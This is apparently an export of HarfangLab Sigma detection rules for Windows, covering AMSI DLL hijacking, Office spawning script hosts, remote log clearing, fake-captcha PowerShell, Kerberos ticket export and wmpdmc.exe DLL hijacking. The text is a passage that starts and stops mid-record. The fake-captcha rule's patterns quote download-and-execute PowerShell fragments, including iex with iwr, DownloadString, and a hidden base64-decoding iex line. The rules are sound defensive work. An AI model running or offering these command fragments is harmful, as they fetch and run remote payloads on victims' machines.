"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-Cornelis-de-Plaas-DLL-hijack-method",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_fake_amsi_creation.yml",
"content": "title: AMSI Library Created in Suspicious Location\nid: 6841ffbd-a5e2-4fea-a4f5-68d0a12bec53\ndescription: |\n Detects the creation of a file called \"amsi.dll\" in an unusual location.\n Attackers can create a fake \"amsi.dll\" file in an unusual location to prevent the processes in the same folder from loading the legitimate library, bypassing the Antimalware Scan Interface (AMSI) mechanism.\n It is recommended to investigate the origin and the content of the written DLL, as well as surrounding security events and the process that wrote the file to disk.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#Using-Cornelis-de-Plaas-DLL-hijack-method\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: file_create\ndetection:\n selection:\n Path|endswith: '\\amsi.dll'\n\n filter_unc_path:\n Path|contains: '\\Device\\HarddiskVolume*\\\\'\n\n exclusion_windows_path:\n Path|endswith:\n - '\\Windows\\system32\\amsi.dll'\n - '\\Windows\\Syswow64\\amsi.dll'\n - '\\Windows\\WinSxS\\\\*\\amsi.dll'\n - '\\Windows\\\\*\\amd64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\Windows\\\\*\\wow64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\W10UIuup\\Windows11*\\amd64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\W10UIuup\\Windows11*\\wow64_microsoft-antimalware-scan-interface*\\amsi.dll'\n - '\\$WINDOWS.~BT\\\\*\\amsi.dll'\n - '\\$WINDOWS.~TMP\\\\*\\amsi.dll'\n\n exclusion_rollup_fix:\n Path|contains: '\\package_for_rollupfix'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6841ffbd-a5e2-4fea-a4f5-68d0a12bec53",
"rule_name": "AMSI Library Created in Suspicious Location",
"rule_description": "Detects the creation of a file called \"amsi.dll\" in an unusual location.\nAttackers can drop a fake \"amsi.dll\" next to a target executable so that, following the Windows DLL search order, processes started from that folder load the fake library instead of the legitimate one in System32, bypassing the Antimalware Scan Interface (AMSI) mechanism.\nWrites under the Windows installation, WinSxS and Windows Update staging directories are filtered out as expected servicing activity.\nIt is recommended to investigate the origin and the content of the written DLL, as well as surrounding security events and the process that wrote the file to disk.\n",
"rule_creation_date": "2025-08-29",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "686d2296-eed8-4f0a-8e68-174ea45e8902",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294549Z",
"creation_date": "2026-03-23T11:45:35.294552Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294559Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1104_office_application_spawning_malicious_processes_appdata.yml",
"content": "title: Dangerous Process Started by Microsoft Office Application with Reference to an AppData Folder\nid: 686d2296-eed8-4f0a-8e68-174ea45e8902\ndescription: |\n Detects various potentially malicious binaries started from Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...) with reference to an AppData folder.\n Attackers can send malicious documents through phishing to gain an initial foothold on their targets.\n The AppData folder is often used by attackers to hide their malicious payloads.\n It is recommended to investigate the parent process to check if a suspicious office document has been opened.\nreferences:\n - https://attack.mitre.org/techniques/T1203/\ndate: 2020/07/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 
'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 'appvlp.exe'\n\n selection_appdata:\n ParentCommandLine|contains: '\\AppData\\'\n\n exclusion_photoviewer:\n # parent is outlook\n # \"C:\\windows\\System32\\rundll32.exe\" \"C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll\", ImageView_Fullscreen C:\\Users\\smalka\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\2UBOS01P\\Screenshot_20210113-145546_WhatsApp.jpg\n CommandLine|contains: '?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n\n exclusion_false_positives:\n # lots of FP here...\n CommandLine:\n - '*ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile*'\n - '*cryptext.dll,CryptExtAddPFX*'\n - '*cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd*'\n - '*?:\\windows\\system32\\spool\\drivers\\\\*'\n - '*\\ZoneCentral\\zedmail.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail.dll*'\n - '*\\ZoneCentral\\zedmail32.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail32.dll*'\n - '*printui.dll,PrintUIEntry*'\n - '*shell32.dll,Control_RunDLL*srchadmin.dll*'\n # - '*c:\\windows\\system32\\mshtml.dll*' # mshtml only could permit dangerous stuff\n - '*dfshim.dll*ShOpenVerbApplication*'\n - '*shell32.dll,SHCreateLocalServerRunDll *{3eef301f-b596-4c0b-bd92-013beafce793}*' # Desktop Undo Manager\n # C:\\windows\\system32\\rundll32.exe C:\\windows\\syswow64\\WININET.dll,DispatchAPICall 1\n - '*\\windows\\syswow64\\WININET.dll,DispatchAPICall 1'\n - '*\\windows\\system32\\WININET.dll,DispatchAPICall 1'\n # C:\\WINDOWS\\system32\\MSIEXEC.EXE /X {AB966E92-1EB2-4BEB-81CA-6B319681B977} /QB\n - '*\\MSIEXEC.EXE /X {????????-????-????-????-????????????} /QB'\n # \"C:\\WINDOWS\\system32\\MSIEXEC.EXE\" /X {7EE8ACD7-531C-4E3E-A481-E2D468CB6DDD} /QB\n - '*\\MSIEXEC.EXE? 
/X {????????-????-????-????-????????????} /QB'\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER *'\n # https://www.tenforums.com/tutorials/77458-rundll32-commands-list-windows-10-a.html\n - '*shwebsvc.dll,AddNetPlaceRunDll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,ImageView_PrintTo *'\n\n exclusion_outlook:\n CommandLine:\n # C:\\Windows\\System32\\msiexec.exe /focmu {90150000-0011-0000-0000-0000000FF1CE} /lwieap C:\\Users\\xxxx\\AppData\\Local\\Temp\\Microsoft Office Professional Plus 2013_repair_log(0002).txt /qb+\n - '?:\\Windows\\System32\\msiexec.exe /focmu {90150000-0011-0000-0000-0000000FF1CE} /lwieap ?:\\Users\\\\*\\AppData\\Local\\Temp\\Microsoft Office *.txt /qb+'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,OpenAs_RunDLL ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\\\*'\n\n exclusion_safeofficeaddin:\n CommandLine:\n - '?:\\WINDOWS\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n - '?:\\Windows\\SysWOW64\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n\n exclusion_genapi:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd'\n\n exclusion_poweruser:\n CommandLine|contains: 'msiexec.exe /i ?:\\Users\\\\*\\Power-user*.msi /QN'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "686d2296-eed8-4f0a-8e68-174ea45e8902",
"rule_name": "Dangerous Process Started by Microsoft Office Application with Reference to an AppData Folder",
"rule_description": "Detects various potentially malicious binaries started from Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...) with reference to an AppData folder.\nAttackers can send malicious documents through phishing to gain an initial foothold on their targets.\nThe AppData folder is often used by attackers to hide their malicious payloads.\nIt is recommended to investigate the parent process to check if a suspicious office document has been opened.\n",
"rule_creation_date": "2020-07-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68dc5935-e8e4-4223-b4ca-abdf6c9864d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626719Z",
"creation_date": "2026-03-23T11:45:34.626721Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626725Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log_remote.yml",
"content": "title: Windows Security Log Cleared Remotely\nid: 68dc5935-e8e4-4223-b4ca-abdf6c9864d3\ndescription: |\n Detects the Windows Security audit log being cleared (event ID 1102) from a session whose logon type is 3 (network logon), i.e. by a remote client rather than from an interactive local session.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to identify the account behind the clearing session, then check for other malicious behavior on the host and the remote host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n SessionLogonType: 3\n user_data.ClientProcessStartKey: '0'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68dc5935-e8e4-4223-b4ca-abdf6c9864d3",
"rule_name": "Windows Security Log Cleared Remotely",
"rule_description": "Detects the Windows Security audit log being cleared (event ID 1102) from a session whose logon type is 3 (network logon), i.e. by a remote client rather than from an interactive local session.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to identify the account behind the clearing session, then check for other malicious behavior on the host and the remote host with the help of the machine's timeline.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68de28b9-b754-4a90-a70e-316dee48d824",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623439Z",
"creation_date": "2026-03-23T11:45:34.623441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623445Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1566_fake_captcha_exploitation_powershell.yml",
"content": "title: Fake Captcha Exploitation Detected via PowerShell\nid: 68de28b9-b754-4a90-a70e-316dee48d824\ndescription: |\n Detects a suspicious Powershell command related to fake Captchas.\n Attackers use fake Captcha verification pages to trick users into executing a malicious Powershell payload by asking them to open and copy paste malicious code into a Powershell terminal.\n This technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the Powershell command to determine its legitimacy.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/10/29\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1059.001\n - attack.t1204.004\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_explorer:\n - ProcessParentImage|endswith: '\\explorer.exe'\n - ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n selection_command1:\n PowershellCommand:\n - '*.b-cdn.net/*'\n - 'mshta \"http*'\n - 'iex (iwr http* -UseBasicParsing).Content'\n - '*; $response = Invoke-WebRequest -Uri $url 
-UseBasicParsing; $text = $response.Content; iex $text'\n - '*largos.short.gy/*'\n - '*PowerShell.exe -W HiDdEN [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(*)) | iex'\n - '*Start-Process \"?:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe\" -ArgumentList \"-w hidden -ep bypass -nop -Command `\"iex ((New-Object System.Net.WebClient).DownloadString(*))`\"\" -WindowStyle Hidden*'\n\n selection_command2:\n PowershellCommand|contains|all:\n - '$webClient = New-Object System.Net.WebClient'\n - '$webClient.DownloadFile($url1,'\n - 'Start-Process -FilePath $env:TEMP\\'\n\n selection_command3:\n PowershellCommand|contains|all:\n - '$env:APPDATA\\'\n - '(Test-Path '\n - '{ New-Item -Path '\n - '-ItemType Directory }'\n - 'Start-BitsTransfer -Source '\n - 'Expand-Archive -Path '\n - 'New-ItemProperty -Path ?HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run? -Name ?'\n\n selection_command4:\n PowershellCommand|contains|all:\n - '=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor(('\n - ')),[byte[]]::new(16)).TransformFinalBlock('\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection_explorer and 1 of selection_command* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68de28b9-b754-4a90-a70e-316dee48d824",
"rule_name": "Fake Captcha Exploitation Detected via PowerShell",
"rule_description": "Detects a suspicious Powershell command related to fake Captchas.\nAttackers use fake Captcha verification pages to trick users into executing a malicious Powershell payload by asking them to open and copy paste malicious code into a Powershell terminal.\nThis technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the Powershell command to determine its legitimacy.\n",
"rule_creation_date": "2024-10-29",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "68fe4fff-4e59-4cff-a376-dc54db74ee2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626179Z",
"creation_date": "2026-03-23T11:45:34.626181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/kerberos-tickets-on-linux-red-teams",
"https://blog.netwrix.com/2022/09/28/how-to-detect-pass-the-ticket-attacks/"
],
"name": "t1558_kirbi_file_written_to_disk.yml",
"content": "title: Kerberos Ticket File Exported to Disk\nid: 68fe4fff-4e59-4cff-a376-dc54db74ee2f\ndescription: |\n Detects the creation of a file on disk with the .kirbi (Windows Kerberos Format), or .ccache (Linux Kerberos Format) extension.\n This is usually the result of memory secret extraction tools, such as mimikatz, which contain modules to export Kerberos tickets from memory.\n It is recommended to investigate the incident to determine if any unauthorized authentication has taken place. An investigative guide is present in the references.\nreferences:\n - https://www.mandiant.com/resources/blog/kerberos-tickets-on-linux-red-teams\n - https://blog.netwrix.com/2022/09/28/how-to-detect-pass-the-ticket-attacks/\ndate: 2023/05/23\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558\n - attack.defense_evasion\n - attack.t1550.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '.ccache'\n - '.kirbi'\n\n exclusion_blkns:\n ProcessCommandLine|contains:\n # C:\\Windows\\Temp\\blckns\\ (base64 UTF16-LE)\n - 'QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABiAGwAYwBrAG4AcwBcA'\n - 'MAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAYgBsAGMAawBuAHMAXA'\n - 'DADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAGIAbABjAGsAbgBzAFwA'\n # Direct execution\n - 'start-transcript -path \\\\\\\\127.0.0.1\\\\?$\\windows\\temp\\blckns\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "68fe4fff-4e59-4cff-a376-dc54db74ee2f",
"rule_name": "Kerberos Ticket File Exported to Disk",
"rule_description": "Detects the creation of a file on disk with the .kirbi (Windows Kerberos Format), or .ccache (Linux Kerberos Format) extension.\nThis is usually the result of memory secret extraction tools, such as mimikatz, which contain modules to export Kerberos tickets from memory.\nIt is recommended to investigate the incident to determine if any unauthorized authentication has taken place. An investigative guide is present in the references.\n",
"rule_creation_date": "2023-05-23",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6916476e-3990-45fa-9370-3bd47e7ff3a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601765Z",
"creation_date": "2026-03-23T11:45:34.601769Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wmpdmc.yml",
"content": "title: DLL Hijacking via wmpdmc.exe\nid: 6916476e-3990-45fa-9370-3bd47e7ff3a6\ndescription: |\n Detects potential Windows DLL Hijacking via wmpdmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n Loads where either the executable or the loaded DLL resides in System32, SysWOW64 or WinSxS, or where the loaded DLL is itself signed by Microsoft Windows, are filtered out; a hit therefore means a Microsoft-signed wmpdmc.exe running from a non-standard path loaded an unsigned or non-Microsoft copy of one of the listed DLL names.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wmpdmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\OLEACC.dll'\n - '\\UxTheme.dll'\n - '\\WindowsCodecs.dll'\n - '\\wmpdui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6916476e-3990-45fa-9370-3bd47e7ff3a6",
"rule_name": "DLL Hijacking via wmpdmc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wmpdmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nLoads where either the executable or the loaded DLL resides in System32, SysWOW64 or WinSxS, or where the loaded DLL is itself signed by Microsoft Windows, are filtered out; a hit therefore means a Microsoft-signed wmpdmc.exe running from a non-standard path loaded an unsigned or non-Microsoft copy of one of the listed DLL names.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6917420f-8cf8-42ed-b237-e6035a048408",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
